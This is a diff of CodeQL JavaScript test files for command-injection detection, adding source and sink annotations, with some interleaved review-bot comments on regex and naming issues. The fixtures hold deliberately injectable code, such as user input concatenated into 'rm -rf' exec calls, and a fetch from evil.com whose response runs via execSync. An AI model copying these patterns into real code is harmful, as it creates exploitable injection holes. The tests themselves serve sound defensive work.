busboy.on('file', function (fieldname, file, filename, encoding, mimetype) { // $ Source exec("touch " + filename); // $ Alert }); req.pipe(busboy); 
@@ -32,12 +32,12 @@ const formidable = require('formidable'); app.post('/api/upload', (req, res, next) => { let form = formidable({ multiples: true }); - form.parse(req, (err, fields, files) => { + form.parse(req, (err, fields, files) => { // $ Source exec("touch " + fields.name); // $ Alert }); let form2 = new formidable.IncomingForm(); - form2.parse(req, (err, fields, files) => { + form2.parse(req, (err, fields, files) => { // $ Source exec("touch " + fields.name); // $ Alert }); }); @@ -49,13 +49,13 @@ http.createServer(function (req, res) { // parse a file upload var form = new multiparty.Form(); - form.parse(req, function (err, fields, files) { + form.parse(req, function (err, fields, files) { // $ Source exec("touch " + fields.name); // $ Alert }); var form2 = new multiparty.Form(); - form2.on('part', function (part) { // / file / field + form2.on('part', function (part) { // $ Source - / file / field exec("touch " + part.filename); // $ Alert }); form2.parse(req); diff --git a/javascript/ql/test/query-tests/Security/CWE-078/CommandInjection/other.js b/javascript/ql/test/query-tests/Security/CWE-078/CommandInjection/other.js index a606c9166175..d4d4b36b674f 100644 --- a/javascript/ql/test/query-tests/Security/CWE-078/CommandInjection/other.js +++ b/javascript/ql/test/query-tests/Security/CWE-078/CommandInjection/other.js @@ -2,7 +2,7 @@ var http = require("http"), url = require("url"); var server = http.createServer(function (req, res) { - let cmd = url.parse(req.url, true).query.path; + let cmd = url.parse(req.url, true).query.path; // $ Source require("cross-spawn").sync(cmd); // $ Alert require("execa").shell(cmd); // $ Alert diff --git a/javascript/ql/test/query-tests/Security/CWE-078/CommandInjection/third-party-command-injection.js b/javascript/ql/test/query-tests/Security/CWE-078/CommandInjection/third-party-command-injection.js index 16d91a4f6599..deb426291d6a 100644 
--- a/javascript/ql/test/query-tests/Security/CWE-078/CommandInjection/third-party-command-injection.js +++ b/javascript/ql/test/query-tests/Security/CWE-078/CommandInjection/third-party-command-injection.js @@ -2,7 +2,7 @@ let https = require("https"), cp = require("child_process"); https.get("https://evil.com/getCommand", res => - res.on("data", command => { + res.on("data", command => { // $ Source cp.execSync(command); // $ Alert }) ); diff --git a/javascript/ql/test/query-tests/Security/CWE-078/IndirectCommandInjection/actions.js b/javascript/ql/test/query-tests/Security/CWE-078/IndirectCommandInjection/actions.js index 74301997e38c..021715395217 100644 --- a/javascript/ql/test/query-tests/Security/CWE-078/IndirectCommandInjection/actions.js +++ b/javascript/ql/test/query-tests/Security/CWE-078/IndirectCommandInjection/actions.js @@ -9,6 +9,6 @@ function test(e) { exec(e['GITHUB_ACTION']); } -test(process.env); +test(process.env); // $ Source exec(getInput('data')); // $ Alert diff --git a/javascript/ql/test/query-tests/Security/CWE-078/IndirectCommandInjection/command-line-parameter-command-injection.js b/javascript/ql/test/query-tests/Security/CWE-078/IndirectCommandInjection/command-line-parameter-command-injection.js index fd1e9cdd9f97..fe5142a0b3c8 100644 --- a/javascript/ql/test/query-tests/Security/CWE-078/IndirectCommandInjection/command-line-parameter-command-injection.js +++ b/javascript/ql/test/query-tests/Security/CWE-078/IndirectCommandInjection/command-line-parameter-command-injection.js @@ -7,7 +7,7 @@ var cp = require("child_process"); cp.exec("cmd.sh " + process.argv[1]); cp.exec("cmd.sh " + process.argv[2]); // $ Alert - var args = process.argv.slice(2); + var args = process.argv.slice(2); // $ Source cp.execSync(args[0]); // $ Alert cp.execSync("cmd.sh " + args[0]); // $ Alert 
@@ -21,7 +21,7 @@ var cp = require("child_process"); }); (function() { - const args = process.argv.slice(2); + const args = process.argv.slice(2); // $ Source const script = path.join(packageDir, 'app', 'index.js'); cp.execSync(`node ${script} ${args[0]} --option"`); // $ Alert cp.execSync(`node ${script} ${args.join(' ')} --option"`); // $ Alert @@ -36,7 +36,7 @@ cp.exec("cmd.sh " + require("optimist").argv.foo); // $ Alert var args = require('yargs') // eslint-disable-line .command('serve [port]', 'start the server', (yargs) => { }) .option('verbose', { foo: "bar" }) - .argv + .argv // $ Source cp.exec("cmd.sh " + args); // $ Alert @@ -47,15 +47,15 @@ cp.exec("cmd.sh " + require("optimist").argv.foo); // $ Alert const { argv: { ...args - }, + }, // $ Source } = require('yargs') .usage('Usage: foo bar') .command(); cp.exec("cmd.sh " + args); // $ Alert - var tainted1 = require('yargs').argv; - var tainted2 = require('yargs').parse() + var tainted1 = require('yargs').argv; // $ Source + var tainted2 = require('yargs').parse() // $ Source const {taint1: {...taint1rest},taint2: {...taint2rest}} = { taint1: tainted1, @@ -65,15 +65,15 @@ cp.exec("cmd.sh " + require("optimist").argv.foo); // $ Alert cp.exec("cmd.sh " + taint1rest); // $ Alert - has flow from tainted1 cp.exec("cmd.sh " + taint2rest); // $ Alert - has flow from tianted2 - var {...taint3} = require('yargs').argv; + var {...taint3} = require('yargs').argv; // $ Source cp.exec("cmd.sh " + taint3); // $ Alert - var [...taint4] = require('yargs').argv; + var [...taint4] = require('yargs').argv; // $ Source cp.exec("cmd.sh " + taint4); // $ Alert }); (function () { - const argv = process.argv.slice(2); + const argv = process.argv.slice(2); // $ Source var minimist = require("minimist"); cp.exec("cmd.sh " + minimist(argv).foo); // $ Alert 
@@ -85,10 +85,10 @@ cp.exec("cmd.sh " + require("optimist").argv.foo); // $ Alert cp.exec("cmd.sh " + yargsParser(process.argv.slice(2)).foo); // $ Alert import args from 'args' - var flags = args.parse(process.argv); + var flags = args.parse(process.argv); // $ Source cp.exec("cmd.sh " + flags.foo); // $ Alert - var flags = require('arg')({...spec}); + var flags = require('arg')({...spec}); // $ Source cp.exec("cmd.sh " + flags.foo); // $ Alert }) @@ -104,14 +104,14 @@ cp.exec("cmd.sh " + require("optimist").argv.foo); // $ Alert (function () { const commandLineArgs = require('command-line-args'); - const options = commandLineArgs(optionDefinitions); + const options = commandLineArgs(optionDefinitions); // $ Source cp.exec("cmd.sh " + options.foo); // $ Alert }); (function () { const meow = require('meow'); - const cli = meow(`helpstring`, {flags: {...flags}}); + const cli = meow(`helpstring`, {flags: {...flags}}); // $ Source cp.exec("cmd.sh " + cli.input[0]); // $ Alert }); @@ -119,18 +119,18 @@ cp.exec("cmd.sh " + require("optimist").argv.foo); // $ Alert (function () { var dashdash = require('dashdash'); - var opts = dashdash.parse({options: options}); + var opts = dashdash.parse({options: options}); // $ Source cp.exec("cmd.sh " + opts.foo); // $ Alert var parser = dashdash.createParser({options: options}); - var opts = parser.parse(); + var opts = parser.parse(); // $ Source cp.exec("cmd.sh " + opts.foo); // $ Alert }); (function () { - const { program } = require('commander'); + const { program } = require('commander'); // $ Source program.version('0.0.1'); cp.exec("cmd.sh " + program.opts().pizzaType); // $ Alert diff --git a/javascript/ql/test/query-tests/Security/CWE-078/SecondOrderCommandInjection/second-order.js b/javascript/ql/test/query-tests/Security/CWE-078/SecondOrderCommandInjection/second-order.js index 16ace6a020f6..b49d6b2bd73b 100644 --- a/javascript/ql/test/query-tests/Security/CWE-078/SecondOrderCommandInjection/second-order.js 
+++ b/javascript/ql/test/query-tests/Security/CWE-078/SecondOrderCommandInjection/second-order.js @@ -3,14 +3,14 @@ const app = express(); const { execFile } = require("child_process"); app.get("/", (req, res) => { - const remote = req.query.remote; + const remote = req.query.remote; // $ Source execFile("git", ["ls-remote", remote]); // $ Alert execFile("git", ["fetch", remote]); // $ Alert indirect("git", ["ls-remote", remote]); // $ Alert - const myArgs = req.query.args; + const myArgs = req.query.args; // $ Source execFile("git", myArgs); // $ Alert diff --git a/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/isImported.js b/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/isImported.js index 5b58e1afe4f2..b4f75df03ac4 100644 --- a/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/isImported.js +++ b/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/isImported.js @@ -2,6 +2,6 @@ const cp = require("child_process"); -module.exports.thisMethodIsImported = function (name) { - cp.exec("rm -rf " + name); // $ Alert +module.exports.thisMethodIsImported = function (name) { // $ Source + cp.exec("rm -rf " + name); // $ Alert Sink } \ No newline at end of file diff --git a/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/lib.js b/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/lib.js index 77f49ad77017..85d0402a8ae8 100644 --- a/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/lib.js +++ b/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/lib.js 
@@ -1,44 +1,44 @@ var cp = require("child_process") -module.exports.blah = function (name) { - cp.exec("rm -rf " + name); // $ Alert +module.exports.blah = function (name) { // $ Source + cp.exec("rm -rf " + name); // $ Alert Sink cp.execFile(name, [name]); cp.execFile(name, name); }; -module.exports.foo = function (name) { - cp.exec("rm -rf " + name); // $ Alert +module.exports.foo = function (name) { // $ Source + cp.exec("rm -rf " + name); // $ Alert Sink } -module.exports.foo.bar = function (name) { - cp.exec("rm -rf " + name); // $ Alert +module.exports.foo.bar = function (name) { // $ Source + cp.exec("rm -rf " + name); // $ Alert Sink } function cla() { } -cla.prototype.method = function (name) { - cp.exec("rm -rf " + name); // $ Alert +cla.prototype.method = function (name) { // $ Source + cp.exec("rm -rf " + name); // $ Alert Sink } module.exports.cla = new cla(); function cla2() { } -cla2.prototype.method = function (name) { - cp.exec("rm -rf " + name); // $ Alert +cla2.prototype.method = function (name) { // $ Source + cp.exec("rm -rf " + name); // $ Alert Sink } module.exports.bla = new cla2(); module.exports.lib2 = require("./lib2.js") class Cla3 { - constructor(name) { - cp.exec("rm -rf " + name); // $ Alert + constructor(name) { // $ Source + cp.exec("rm -rf " + name); // $ Alert Sink } - static foo(name) { - cp.exec("rm -rf " + name); // $ Alert + static foo(name) { // $ Source + cp.exec("rm -rf " + name); // $ Alert Sink } - bar(name) { - cp.exec("rm -rf " + name); // $ Alert + bar(name) { // $ Source + cp.exec("rm -rf " + name); // $ Alert Sink cp.exec("rm -rf " + notASource); } 
@@ -46,41 +46,41 @@ class Cla3 { module.exports.cla3 = Cla3; -module.exports.mz = function (name) { - require("mz/child_process").exec("rm -rf " + name); // $ Alert +module.exports.mz = function (name) { // $ Source + require("mz/child_process").exec("rm -rf " + name); // $ Alert Sink } -module.exports.flow = function (name) { - var cmd1 = "rm -rf " + name; // $ Alert +module.exports.flow = function (name) { // $ Source + var cmd1 = "rm -rf " + name; // $ Alert Sink cp.exec(cmd1); - var cmd2 = "rm -rf " + name; // $ Alert + var cmd2 = "rm -rf " + name; // $ Alert Sink function myExec(cmd) { cp.exec(cmd); } myExec(cmd2); } -module.exports.stringConcat = function (name) { - cp.exec("rm -rf " + name); // $ Alert +module.exports.stringConcat = function (name) { // $ Source + cp.exec("rm -rf " + name); // $ Alert Sink cp.exec(name); - cp.exec("for foo in (" + name + ") do bla end"); // $ Alert + cp.exec("for foo in (" + name + ") do bla end"); // $ Alert Sink - cp.exec("cat /foO/BAR/" + name) // $ Alert + cp.exec("cat /foO/BAR/" + name) // $ Alert Sink - cp.exec("cat \"" + name + "\"") // $ Alert + cp.exec("cat \"" + name + "\"") // $ Alert Sink - cp.exec("cat '" + name + "'") // $ Alert + cp.exec("cat '" + name + "'") // $ Alert Sink - cp.exec("cat '/foo/bar" + name + "'") // $ Alert + cp.exec("cat '/foo/bar" + name + "'") // $ Alert Sink cp.exec(name + " some file") } -module.exports.arrays = function (name) { - cp.exec("rm -rf " + name); // $ Alert +module.exports.arrays = function (name) { // $ Source + cp.exec("rm -rf " + name); // $ Alert Sink var args1 = ["node"]; args1.push(name); // $ Alert @@ -94,7 +94,7 @@ module.exports.arrays = function (name) { } var util = require("util"); -module.exports.format = function (name) { +module.exports.format = function (name) { // $ Source cp.exec(util.format("rm -rf %s", name)); // $ Alert cp.exec(util.format("rm -rf '%s'", name)); // $ Alert 
@@ -108,8 +108,8 @@ module.exports.format = function (name) { cp.exec(require("printf")('rm -rf %s', name)); // $ Alert } -module.exports.valid = function (name) { - cp.exec("rm -rf " + name); // $ Alert +module.exports.valid = function (name) { // $ Source + cp.exec("rm -rf " + name); // $ Alert Sink if (!isValidName(name)) { return; @@ -117,8 +117,8 @@ module.exports.valid = function (name) { cp.exec("rm -rf " + name); } -module.exports.safe = function (name) { - cp.exec("rm -rf " + name); // $ Alert +module.exports.safe = function (name) { // $ Source + cp.exec("rm -rf " + name); // $ Alert Sink if (!isSafeName(name)) { return; @@ -127,8 +127,8 @@ module.exports.safe = function (name) { } class Cla4 { - wha(name) { - cp.exec("rm -rf " + name); // $ Alert + wha(name) { // $ Source + cp.exec("rm -rf " + name); // $ Alert Sink } static bla(name) { @@ -145,20 +145,20 @@ function Cla5(name) { } module.exports.cla5 = new Cla5(); -module.exports.indirect = function (name) { - let cmd = "rm -rf " + name; // $ Alert +module.exports.indirect = function (name) { // $ Source + let cmd = "rm -rf " + name; // $ Alert Sink let sh = "sh"; let args = ["-c", cmd]; cp.spawn(sh, args, cb); } -module.exports.indirect2 = function (name) { +module.exports.indirect2 = function (name) { // $ Source let cmd = name; let sh = "sh"; let args = ["-c", cmd]; cp.spawn(sh, args, cb); - let cmd2 = "rm -rf " + name; // $ Alert + let cmd2 = "rm -rf " + name; // $ Alert Sink var args2 = [cmd2]; cp.spawn( 'cmd.exe', 
@@ -167,65 +167,65 @@ module.exports.indirect2 = function (name) { ); } -module.exports.cmd = function (command, name) { +module.exports.cmd = function (command, name) { // $ Source cp.exec("fo | " + command); - cp.exec("fo | " + name); // $ Alert + cp.exec("fo | " + name); // $ Alert Sink } -module.exports.sanitizer = function (name) { +module.exports.sanitizer = function (name) { // $ Source var sanitized = "'" + name.replace(/'/g, "'\\''") + "'" cp.exec("rm -rf " + sanitized); - var broken = "'" + name.replace(/'/g, "'\''") + "'" // $ Alert - cp.exec("rm -rf " + broken); // $ Alert + var broken = "'" + name.replace(/'/g, "'\''") + "'" // $ Alert Sink + cp.exec("rm -rf " + broken); // $ Alert Sink } var path = require("path"); -module.exports.guard = function (name) { - cp.exec("rm -rf " + name); // $ Alert +module.exports.guard = function (name) { // $ Source + cp.exec("rm -rf " + name); // $ Alert Sink if (!path.exist(name)) { - cp.exec("rm -rf " + name); // $ Alert + cp.exec("rm -rf " + name); // $ Alert Sink return; } cp.exec("rm -rf " + name); } -module.exports.blacklistOfChars = function (name) { - cp.exec("rm -rf " + name); // $ Alert +module.exports.blacklistOfChars = function (name) { // $ Source + cp.exec("rm -rf " + name); // $ Alert Sink if (/[^A-Za-z0-9_\/:=-]/.test(name)) { - cp.exec("rm -rf " + name); // $ Alert + cp.exec("rm -rf " + name); // $ Alert Sink } else { cp.exec("rm -rf " + name); } } -module.exports.whitelistOfChars = function (name) { - cp.exec("rm -rf " + name); // $ Alert +module.exports.whitelistOfChars = function (name) { // $ Source + cp.exec("rm -rf " + name); // $ Alert Sink if (/^[A-Za-z0-9_\/:=-]$/.test(name)) { cp.exec("rm -rf " + name); } else { - cp.exec("rm -rf " + name); // $ Alert + cp.exec("rm -rf " + name); // $ Alert Sink } } -module.exports.blackList2 = function (name) { - cp.exec("rm -rf " + name); // $ Alert +module.exports.blackList2 = function (name) { // $ Source + cp.exec("rm -rf " + name); // $ Alert Sink if 
(!/^([a-zA-Z0-9]+))?$/.test(name)) { - cp.exec("rm -rf " + name); // $ Alert + cp.exec("rm -rf " + name); // $ Alert Sink process.exit(-1); } - cp.exec("rm -rf " + name); // $ SPURIOUS: Alert - FP due to tracking flow through `process.exit()`. + cp.exec("rm -rf " + name); // $ Sink SPURIOUS: Alert - FP due to tracking flow through `process.exit()`. } -module.exports.accessSync = function (name) { - cp.exec("rm -rf " + name); // $ Alert +module.exports.accessSync = function (name) { // $ Source + cp.exec("rm -rf " + name); // $ Alert Sink try { path.accessSync(name); @@ -233,7 +233,7 @@ module.exports.accessSync = function (name) { return; } - cp.exec("rm -rf " + name); // $ SPURIOUS: Alert - FP due to `path.accessSync` not being recognized as a sanitizer. + cp.exec("rm -rf " + name); // $ Sink SPURIOUS: Alert - FP due to `path.accessSync` not being recognized as a sanitizer. } var cleanInput = function (s) { 
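Review bot: The guard in `blackList2` (lib.js, hunk at -167) tests `/^([a-zA-Z0-9]+))?$/`, which has one more `)` than `(`, so the literal is not a well-formed regular expression. The `Alert Sink` and `Sink SPURIOUS: Alert` expectations around it may therefore not exercise the regex guard they appear to target. Presumably `/^([a-zA-Z0-9]+)?$/` was intended; the line is unchanged context, so the problem predates the annotations added here. In the same hunk, the `broken` line in `sanitizer` would benefit from a comment saying why it differs from `sanitized`: `// "'\''" is the JS string ''' (the backslash is dropped), so quotes in name are not escaped`.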
@@ -245,27 +245,27 @@ var cleanInput = function (s) { return s; } -module.exports.goodSanitizer = function (name) { - cp.exec("rm -rf " + name); // $ Alert +module.exports.goodSanitizer = function (name) { // $ Source + cp.exec("rm -rf " + name); // $ Alert Sink var cleaned = cleanInput(name); - cp.exec("rm -rf " + cleaned); // $ SPURIOUS: Alert - SanitizingRegExpTest is not able to generate a barrier edge for an edge into a phi node. + cp.exec("rm -rf " + cleaned); // $ Sink SPURIOUS: Alert - SanitizingRegExpTest is not able to generate a barrier edge for an edge into a phi node. } var fs = require("fs"); -module.exports.guard2 = function (name) { - cp.exec("rm -rf " + name); // $ Alert +module.exports.guard2 = function (name) { // $ Source + cp.exec("rm -rf " + name); // $ Alert Sink if (!fs.existsSync("prefix/" + name)) { - cp.exec("rm -rf prefix/" + name); // $ Alert + cp.exec("rm -rf prefix/" + name); // $ Alert Sink return; } cp.exec("rm -rf prefix/" + name); } -module.exports.sanitizerProperty = function (obj) { - cp.exec("rm -rf " + obj.version); // $ Alert +module.exports.sanitizerProperty = function (obj) { // $ Source + cp.exec("rm -rf " + obj.version); // $ Alert Sink obj.version = ""; @@ -273,12 +273,12 @@ module.exports.sanitizerProperty = function (obj) { } module.exports.Foo = class Foo { - start(opts) { - cp.exec("rm -rf " + opts.bla); // $ Alert + start(opts) { // $ Source + cp.exec("rm -rf " + opts.bla); // $ Alert Sink this.opts = {}; this.opts.bla = opts.bla - cp.exec("rm -rf " + this.opts.bla); // $ Alert + cp.exec("rm -rf " + this.opts.bla); // $ Alert Sink } } 
@@ -304,25 +304,25 @@ function sanitizeShellString(str) { return result } -module.exports.sanitizer2 = function (name) { - cp.exec("rm -rf " + name); // $ Alert +module.exports.sanitizer2 = function (name) { // $ Source + cp.exec("rm -rf " + name); // $ Alert Sink var sanitized = sanitizeShellString(name); cp.exec("rm -rf " + sanitized); } -module.exports.typeofcheck = function (name) { - cp.exec("rm -rf " + name); // $ Alert +module.exports.typeofcheck = function (name) { // $ Source + cp.exec("rm -rf " + name); // $ Alert Sink if (typeof name === "undefined") { cp.exec("rm -rf " + name); } else { - cp.exec("rm -rf " + name); // $ Alert + cp.exec("rm -rf " + name); // $ Alert Sink } } -module.exports.typeofcheck = function (arg) { - var cmd = "MyWindowCommand | findstr /i /c:" + arg; // $ Alert +module.exports.typeofcheck = function (arg) { // $ Source + var cmd = "MyWindowCommand | findstr /i /c:" + arg; // $ Alert Sink cp.exec(cmd); } @@ -336,8 +336,8 @@ module.exports.unproblematic = function() { cp.exec("rm -rf " + id("test")); }; -module.exports.problematic = function(n) { - cp.exec("rm -rf " + id(n)); // $ Alert +module.exports.problematic = function(n) { // $ Source + cp.exec("rm -rf " + id(n)); // $ Alert Sink }; module.exports.typeofNumber = function(n) { @@ -346,9 +346,9 @@ module.exports.typeofNumber = function(n) { } }; -function boundProblem(safe, unsafe) { +function boundProblem(safe, unsafe) { // $ Source cp.exec("rm -rf " + safe); - cp.exec("rm -rf " + unsafe); // $ Alert + cp.exec("rm -rf " + unsafe); // $ Alert Sink } Object.defineProperty(module.exports, "boundProblem", { @@ -402,8 +402,8 @@ function yetAnohterSanitizer(str) { return result; } -module.exports.sanitizer3 = function (name) { - cp.exec("rm -rf " + name); // $ Alert +module.exports.sanitizer3 = function (name) { // $ Source + cp.exec("rm -rf " + name); // $ Alert Sink var sanitized = yetAnohterSanitizer(name); cp.exec("rm -rf " + sanitized); 
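Review bot: `module.exports.typeofcheck` is assigned twice in the hunk at -304 of lib.js, first with `function (name)` and then with `function (arg)`, and both signatures now carry `// $ Source`. At run time the second assignment replaces the first, so the expectations on the first function presumably hold only because the analysis treats every assignment to an export as reachable. Renaming the second one, e.g. `module.exports.typeofcheck2 = function (arg) { // $ Source`, would keep the two cases independent of that behaviour. The duplicate name is existing code that this change only annotates.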
@@ -411,8 +411,8 @@ module.exports.sanitizer3 = function (name) { const cp = require("child_process"); const spawn = cp.spawn; -module.exports.shellOption = function (name) { - cp.exec("rm -rf " + name); // $ Alert +module.exports.shellOption = function (name) { // $ Source + cp.exec("rm -rf " + name); // $ Alert Sink cp.execFile("rm", ["-rf", name], {shell: true}, (err, out) => {}); // $ Alert cp.spawn("rm", ["-rf", name], {shell: true}); // $ Alert @@ -438,13 +438,13 @@ function build(first, last) { }; var asyncExec = require("async-execute"); -module.exports.asyncStuff = function (name) { - asyncExec("rm -rf " + name); // $ Alert +module.exports.asyncStuff = function (name) { // $ Source + asyncExec("rm -rf " + name); // $ Alert Sink } const myFuncs = { - myFunc: function (name) { - asyncExec("rm -rf " + name); // $ Alert + myFunc: function (name) { // $ Source + asyncExec("rm -rf " + name); // $ Alert Sink } }; @@ -474,13 +474,13 @@ const {promisify} = require('util'); const exec = promisify(require('child_process').exec); -module.exports.check = function check(config) { +module.exports.check = function check(config) { // $ Source const cmd = path.join(config.installedPath, 'myBinary -v'); // $ Alert return exec(cmd); } -module.exports.splitConcat = function (name) { - let args = ' my name is ' + name; // $ Alert +module.exports.splitConcat = function (name) { // $ Source + let args = ' my name is ' + name; // $ Alert Sink let cmd = 'echo'; cp.exec(cmd + args); } @@ -495,8 +495,8 @@ module.exports.myCommand = function (myCommand) { cp: require('child_process') }; - module.exports.myIndirectThing = function (name) { - MyThing.cp.exec("rm -rf " + name); // $ Alert + module.exports.myIndirectThing = function (name) { // $ Source + MyThing.cp.exec("rm -rf " + name); // $ Alert Sink } }); 
@@ -506,48 +506,48 @@ for (var name in imp){ module.exports[name] = imp[name]; } -module.exports.sanitizer4 = function (name) { - cp.exec("rm -rf " + name); // $ Alert +module.exports.sanitizer4 = function (name) { // $ Source + cp.exec("rm -rf " + name); // $ Alert Sink if (isNaN(name)) { - cp.exec("rm -rf " + name); // $ Alert + cp.exec("rm -rf " + name); // $ Alert Sink } else { cp.exec("rm -rf " + name); } if (isNaN(parseInt(name))) { - cp.exec("rm -rf " + name); // $ Alert + cp.exec("rm -rf " + name); // $ Alert Sink } else { cp.exec("rm -rf " + name); } if (isNaN(+name)) { - cp.exec("rm -rf " + name); // $ Alert + cp.exec("rm -rf " + name); // $ Alert Sink } else { cp.exec("rm -rf " + name); } if (isNaN(parseInt(name, 10))) { - cp.exec("rm -rf " + name); // $ Alert + cp.exec("rm -rf " + name); // $ Alert Sink } else { cp.exec("rm -rf " + name); } if (isNaN(name - 0)) { - cp.exec("rm -rf " + name); // $ Alert + cp.exec("rm -rf " + name); // $ Alert Sink } else { cp.exec("rm -rf " + name); } if (isNaN(name | 0)) { // <- not a sanitizer - cp.exec("rm -rf " + name); // $ Alert + cp.exec("rm -rf " + name); // $ Alert Sink } else { - cp.exec("rm -rf " + name); // $ Alert + cp.exec("rm -rf " + name); // $ Alert Sink } } -module.exports.shellThing = function (name) { +module.exports.shellThing = function (name) { // $ Source function indirectShell(cmd, args, spawnOpts) { cp.spawn(cmd, args, spawnOpts); // $ Alert } 
@@ -555,28 +555,28 @@ module.exports.shellThing = function (name) { indirectShell("rm", ["-rf", name], {shell: true}); // $ Alert } -module.exports.badSanitizer = function (name) { +module.exports.badSanitizer = function (name) { // $ Source if (!name.match(/^(.|\.){1,64}$/)) { // <- bad sanitizer - exec("rm -rf " + name); // $ Alert + exec("rm -rf " + name); // $ Alert Sink } else { - exec("rm -rf " + name); // $ Alert + exec("rm -rf " + name); // $ Alert Sink } if (!name.match(/^\w{1,64}$/)) { // <- good sanitizer - exec("rm -rf " + name); // $ Alert + exec("rm -rf " + name); // $ Alert Sink } else { exec("rm -rf " + name); } } -module.exports.safeWithBool = function (name) { - cp.exec("rm -rf " + name); // $ Alert +module.exports.safeWithBool = function (name) { // $ Source + cp.exec("rm -rf " + name); // $ Alert Sink if (isSafeName(name)) { cp.exec("rm -rf " + name); } - cp.exec("rm -rf " + name); // $ Alert + cp.exec("rm -rf " + name); // $ Alert Sink if (isSafeName(name) === true) { cp.exec("rm -rf " + name); @@ -587,10 +587,10 @@ module.exports.safeWithBool = function (name) { } if (isSafeName(name) == false) { - cp.exec("rm -rf " + name); // $ Alert + cp.exec("rm -rf " + name); // $ Alert Sink } - cp.exec("rm -rf " + name); // $ Alert + cp.exec("rm -rf " + name); // $ Alert Sink } function indirectThing(name) { @@ -605,8 +605,8 @@ function moreIndirect(name) { return indirectThing2(name) !== false; } -module.exports.veryIndeirect = function (name) { - cp.exec("rm -rf " + name); // $ Alert +module.exports.veryIndeirect = function (name) { // $ Source + cp.exec("rm -rf " + name); // $ Alert Sink if (indirectThing(name)) { cp.exec("rm -rf " + name); 
@@ -623,15 +623,15 @@ module.exports.veryIndeirect = function (name) { if (moreIndirect(name) !== false) { cp.exec("rm -rf " + name); } else { - cp.exec("rm -rf " + name); // $ Alert + cp.exec("rm -rf " + name); // $ Alert Sink } - cp.exec("rm -rf " + name); // $ Alert + cp.exec("rm -rf " + name); // $ Alert Sink } -module.exports.sanitizer = function (name) { - var sanitized = "'" + name.replace(new RegExp("\'"), "'\\''") + "'" // $ Alert - cp.exec("rm -rf " + sanitized); // $ Alert +module.exports.sanitizer = function (name) { // $ Source + var sanitized = "'" + name.replace(new RegExp("\'"), "'\\''") + "'" // $ Alert Sink + cp.exec("rm -rf " + sanitized); // $ Alert Sink var sanitized = "'" + name.replace(new RegExp("\'", 'g'), "'\\''") + "'" cp.exec("rm -rf " + sanitized); diff --git a/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/lib2.js b/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/lib2.js index 6dc040fd7800..9c427622c770 100644 --- a/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/lib2.js +++ b/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/lib2.js @@ -1,9 +1,9 @@ var cp = require("child_process") -module.exports = function (name) { - cp.exec("rm -rf " + name); // $ Alert - is imported from main module. +module.exports = function (name) { // $ Source + cp.exec("rm -rf " + name); // $ Alert Sink - is imported from main module. }; -module.exports.foo = function (name) { - cp.exec("rm -rf " + name); // $ Alert - is imported from main module. +module.exports.foo = function (name) { // $ Source + cp.exec("rm -rf " + name); // $ Alert Sink - is imported from main module. }; \ No newline at end of file 
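Review bot: The first `sanitized` line in the `sanitizer` hunk (-623) is now marked `Alert Sink`, but nothing on it says why this quoting attempt is rejected while the near-identical line two statements later is accepted. The only difference visible in the hunk is the missing `'g'` flag: `name.replace(new RegExp("\'"), ...)` escapes just the first single quote, so a later quote in `name` still ends the quoted shell argument. A trailing explanation in the style of the nearby `// <- bad sanitizer` comments, e.g. `// $ Alert Sink - no 'g' flag, only the first quote is escaped`, would document that. The body of `sanitizer` continues outside the hunk.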
diff --git a/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/subLib/amdSub.js b/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/subLib/amdSub.js
index df2b9bd82e60..e268f47c4e20 100644
--- a/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/subLib/amdSub.js
+++ b/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/subLib/amdSub.js
@@ -1,5 +1,5 @@
 const cp = require("child_process");
-module.exports = function (name) {
- cp.exec("rm -rf " + name); // $ Alert - this function is exported from `amd.js`
+module.exports = function (name) { // $ Source
+ cp.exec("rm -rf " + name); // $ Alert Sink - this function is exported from `amd.js`
 };
\ No newline at end of file
diff --git a/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/subLib/index.js b/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/subLib/index.js
index ba4bd7089693..0b1abc951286 100644
--- a/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/subLib/index.js
+++ b/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/subLib/index.js
@@ -1,15 +1,15 @@
 var cp = require("child_process")
-module.exports = function (name) {
- cp.exec("rm -rf " + name); // $ Alert - functions exported as part of a submodule are also flagged.
+module.exports = function (name) { // $ Source
+ cp.exec("rm -rf " + name); // $ Alert Sink - functions exported as part of a submodule are also flagged.
 };
-module.exports.foo = function (name) {
- cp.exec("rm -rf " + name); // $ Alert - this is being called explicitly from child_process-test.js
+module.exports.foo = function (name) { // $ Source
+ cp.exec("rm -rf " + name); // $ Alert Sink - this is being called explicitly from child_process-test.js
 };
 module.exports.amd = require("./amd.js");
-module.exports.arrToShell = function (cmd, arr) {
+module.exports.arrToShell = function (cmd, arr) { // $ Source
 cp.spawn("echo", arr, {shell: true}); // $ Alert
 }
\ No newline at end of file
diff --git a/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/subLib2/compiled-file.ts b/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/subLib2/compiled-file.ts
index f2e6b7672f89..e6b7a10bacf6 100644
--- a/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/subLib2/compiled-file.ts
